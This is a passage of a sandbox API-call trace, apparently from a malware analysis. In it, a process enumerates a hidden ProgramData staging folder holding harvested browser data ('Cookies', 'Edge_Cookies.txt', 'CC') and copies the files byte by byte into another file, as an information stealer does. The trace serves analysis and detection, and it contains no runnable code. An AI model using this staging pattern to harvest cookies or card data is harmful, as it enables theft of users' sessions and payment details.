lpString2=".." | out: lpString1="\\CC\\..") returned="\\CC\\.." [0116.042] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0116.042] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0116.043] FindNextFileW (in: hFindFile=0x743320, lpFindFileData=0x19e4b8 | out: lpFindFileData=0x19e4b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x34781885, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x34781885, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x34781885, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0116.043] FindClose (in: hFindFile=0x743320 | out: hFindFile=0x743320) returned 1 [0116.043] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x3970048 [0116.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\CC", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0116.043] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x32) returned 0x38ea918 [0116.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\CC", cchWideChar=50, lpMultiByteStr=0x38ea918, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\CC", lpUsedDefaultChar=0x0) returned 50 [0116.043] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2c00 [0116.043] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea918 | out: hHeap=0x29a0000) returned 1 [0116.043] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0116.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19f6c0, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0116.043] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x8) returned 0x29a68e8 [0116.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19f6c0, cbMultiByte=4, lpWideCharStr=0x29a68e8, cchWideChar=4 | out: lpWideCharStr="*.*") returned 4 [0116.043] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a68e8 | out: hHeap=0x29a0000) returned 1 [0116.043] PathMatchSpecW (pszFile="CC", pszSpec="*.*") returned 1 [0116.043] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x3970048 [0116.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\CC", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0116.043] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x32) returned 0x38ea618 [0116.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\CC", cchWideChar=50, lpMultiByteStr=0x38ea618, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\CC", lpUsedDefaultChar=0x0) returned 50 [0116.043] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2f18 [0116.043] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea618 | out: hHeap=0x29a0000) returned 1 [0116.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\CC", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0116.043] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6898 [0116.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\CC", cchWideChar=4, lpMultiByteStr=0x29a6898, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\CC", lpUsedDefaultChar=0x0) returned 4 [0116.043] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6898 | out: hHeap=0x29a0000) returned 1 [0116.043] CreateFileA (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\CC" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\cc"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0116.044] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2f18 | out: hHeap=0x29a0000) returned 1 [0116.044] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0116.044] DeleteFileW (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\CC" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\cc")) returned 0 [0116.044] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2c00 | out: hHeap=0x29a0000) returned 1 [0116.044] FindNextFileW (in: hFindFile=0x743920, lpFindFileData=0x19ee38 | out: lpFindFileData=0x19ee38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3478041c, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x3478041c, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x3478041c, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0116.044] lstrcpyW (in: lpString1=0x19f088, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files" [0116.044] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\" [0116.044] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\", lpString2="Cookies" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies" [0116.044] lstrcpyW (in: lpString1=0x19f290, lpString2="" | out: lpString1="") returned="" [0116.044] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0116.044] lstrcatW (in: lpString1="\\", lpString2="Cookies" | out: lpString1="\\Cookies") returned="\\Cookies" [0116.044] lstrcmpW (lpString1="Cookies", lpString2=".") returned 1 [0116.044] lstrcmpW (lpString1="Cookies", lpString2="..") returned 1 [0116.044] lstrcpyW (in: lpString1=0x19eb18, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies" [0116.044] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies", lpString2="\\*.*" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies\\*.*") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies\\*.*" [0116.044] FindFirstFileW (in: lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies\\*.*", lpFindFileData=0x19e4b8 | out: lpFindFileData=0x19e4b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3478041c, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x3478041c, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x34c99d98, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7434e0 [0116.044] lstrcpyW (in: lpString1=0x19e708, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies" [0116.044] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies\\" [0116.044] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies\\", lpString2="." | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies\\.") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies\\." [0116.044] lstrcpyW (in: lpString1=0x19e910, lpString2="\\Cookies" | out: lpString1="\\Cookies") returned="\\Cookies" [0116.044] lstrcatW (in: lpString1="\\Cookies", lpString2="\\" | out: lpString1="\\Cookies\\") returned="\\Cookies\\" [0116.045] lstrcatW (in: lpString1="\\Cookies\\", lpString2="." | out: lpString1="\\Cookies\\.") returned="\\Cookies\\." [0116.045] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0116.045] FindNextFileW (in: hFindFile=0x7434e0, lpFindFileData=0x19e4b8 | out: lpFindFileData=0x19e4b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3478041c, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x3478041c, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x34c99d98, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.045] lstrcpyW (in: lpString1=0x19e708, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies" [0116.045] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies\\" [0116.045] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies\\", lpString2=".." | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies\\..") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies\\.." [0116.045] lstrcpyW (in: lpString1=0x19e910, lpString2="\\Cookies" | out: lpString1="\\Cookies") returned="\\Cookies" [0116.045] lstrcatW (in: lpString1="\\Cookies", lpString2="\\" | out: lpString1="\\Cookies\\") returned="\\Cookies\\" [0116.045] lstrcatW (in: lpString1="\\Cookies\\", lpString2=".." | out: lpString1="\\Cookies\\..") returned="\\Cookies\\.." [0116.045] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0116.045] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0116.045] FindNextFileW (in: hFindFile=0x7434e0, lpFindFileData=0x19e4b8 | out: lpFindFileData=0x19e4b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34c99d98, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x34c99d98, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x34c99d98, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Edge_Cookies.txt", cAlternateFileName="EDGE_C~1.TXT")) returned 1 [0116.045] lstrcpyW (in: lpString1=0x19e708, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies" [0116.045] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies\\" [0116.045] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies\\", lpString2="Edge_Cookies.txt" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies\\Edge_Cookies.txt") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies\\Edge_Cookies.txt" [0116.045] lstrcpyW (in: lpString1=0x19e910, lpString2="\\Cookies" | out: lpString1="\\Cookies") returned="\\Cookies" [0116.045] lstrcatW (in: lpString1="\\Cookies", lpString2="\\" | out: lpString1="\\Cookies\\") returned="\\Cookies\\" [0116.045] lstrcatW (in: lpString1="\\Cookies\\", lpString2="Edge_Cookies.txt" | out: lpString1="\\Cookies\\Edge_Cookies.txt") returned="\\Cookies\\Edge_Cookies.txt" [0116.045] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x90) returned 0x3970048 [0116.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies\\Edge_Cookies.txt", cchWideChar=72, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0116.045] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x48) returned 0x38eb298 [0116.046] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies\\Edge_Cookies.txt", cchWideChar=72, lpMultiByteStr=0x38eb298, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies\\Edge_Cookies.txt", lpUsedDefaultChar=0x0) returned 72 [0116.046] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x38eac08 [0116.046] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38eb298 | out: hHeap=0x29a0000) returned 1 [0116.046] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0116.046] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19ed40, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0116.046] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x8) returned 0x29a6918 [0116.046] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19ed40, cbMultiByte=4, lpWideCharStr=0x29a6918, cchWideChar=4 | out: lpWideCharStr="*.*") returned 4 [0116.046] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6918 | out: hHeap=0x29a0000) returned 1 [0116.046] PathMatchSpecW (pszFile="Edge_Cookies.txt", pszSpec="*.*") returned 1 [0116.046] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x90) returned 0x3970048 [0116.046] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2e40 [0116.046] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies\\Edge_Cookies.txt", cchWideChar=72, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0116.046] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x48) returned 0x38eb518 [0116.046] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies\\Edge_Cookies.txt", cchWideChar=72, lpMultiByteStr=0x38eb518, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies\\Edge_Cookies.txt", lpUsedDefaultChar=0x0) returned 72 [0116.046] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x38eaaa8 [0116.046] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38eb518 | out: hHeap=0x29a0000) returned 1 [0116.046] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\Cookies\\Edge_Cookies.txt", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0116.046] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x1a) returned 0x3970538 [0116.046] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\Cookies\\Edge_Cookies.txt", cchWideChar=26, lpMultiByteStr=0x3970538, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\Cookies\\Edge_Cookies.txt", lpUsedDefaultChar=0x0) returned 26 [0116.046] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970420 [0116.046] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970538 | out: hHeap=0x29a0000) returned 1 [0116.046] GetLastError () returned 0x5 [0116.046] SetLastError (dwErrCode=0x5) [0116.046] GetLastError () returned 0x5 [0116.046] SetLastError (dwErrCode=0x5) [0116.046] GetLastError () returned 0x5 [0116.047] SetLastError (dwErrCode=0x5) [0116.047] GetLastError () returned 0x5 [0116.047] SetLastError (dwErrCode=0x5) [0116.047] GetLastError () returned 0x5 [0116.047] SetLastError (dwErrCode=0x5) [0116.047] GetLastError () returned 0x5 [0116.047] SetLastError (dwErrCode=0x5) [0116.047] GetLastError () returned 0x5 [0116.047] SetLastError (dwErrCode=0x5) [0116.047] GetLastError () returned 0x5 [0116.047] SetLastError (dwErrCode=0x5) [0116.047] CreateFileA (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Cookies\\Edge_Cookies.txt" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\cookies\\edge_cookies.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x564 [0116.048] SetFilePointer (in: hFile=0x358, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.048] GetFileInformationByHandle (in: hFile=0x564, lpFileInformation=0x19de5c | out: lpFileInformation=0x19de5c) returned 1 [0116.048] GetFileSize (in: hFile=0x564, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x0 [0116.048] FileTimeToSystemTime (in: lpFileTime=0x19de1c, lpSystemTime=0x19de04 | out: lpSystemTime=0x19de04) returned 1 [0116.048] SetFilePointer (in: hFile=0x564, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.052] WriteFile (in: hFile=0x358, lpBuffer=0x19def3*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19ded0, lpOverlapped=0x0 | out: lpBuffer=0x19def3*, lpNumberOfBytesWritten=0x19ded0*=0x1, lpOverlapped=0x0) returned 1 [0116.205] WriteFile (in: hFile=0x358, lpBuffer=0x19def3*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dec4, lpOverlapped=0x0 | out: lpBuffer=0x19def3*, lpNumberOfBytesWritten=0x19dec4*=0x1, lpOverlapped=0x0) returned 1 [0116.205] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deb8, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deb8*=0x1, lpOverlapped=0x0) returned 1 [0116.205] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deac, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deac*=0x1, lpOverlapped=0x0) returned 1 [0116.205] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dea0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dea0*=0x1, lpOverlapped=0x0) returned 1 [0116.205] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19de94, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19de94*=0x1, lpOverlapped=0x0) returned 1 [0116.206] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19ded0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19ded0*=0x1, lpOverlapped=0x0) returned 1 [0116.206] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dec4, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dec4*=0x1, lpOverlapped=0x0) returned 1 [0116.206] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deb8, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deb8*=0x1, lpOverlapped=0x0) returned 1 [0116.206] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deac, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deac*=0x1, lpOverlapped=0x0) returned 1 [0116.206] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dea0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dea0*=0x1, lpOverlapped=0x0) returned 1 [0116.206] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19de94, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19de94*=0x1, lpOverlapped=0x0) returned 1 [0116.206] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19ded0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19ded0*=0x1, lpOverlapped=0x0) returned 1 [0116.206] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dec4, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dec4*=0x1, lpOverlapped=0x0) returned 1 [0116.206] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deb8, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deb8*=0x1, lpOverlapped=0x0) returned 1 [0116.206] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deac, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deac*=0x1, lpOverlapped=0x0) returned 1 [0116.207] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dea0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dea0*=0x1, lpOverlapped=0x0) returned 1 [0116.207] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19de94, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19de94*=0x1, lpOverlapped=0x0) returned 1 [0116.207] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19ded0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19ded0*=0x1, lpOverlapped=0x0) returned 1 [0116.207] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dec4, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dec4*=0x1, lpOverlapped=0x0) returned 1 [0116.207] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deb8, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deb8*=0x1, lpOverlapped=0x0) returned 1 [0116.207] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deac, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deac*=0x1, lpOverlapped=0x0) returned 1 [0116.207] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dea0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dea0*=0x1, lpOverlapped=0x0) returned 1 [0116.207] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19de94, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19de94*=0x1, lpOverlapped=0x0) returned 1 [0116.208] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19ded0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19ded0*=0x1, lpOverlapped=0x0) returned 1 [0116.208] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dec4, 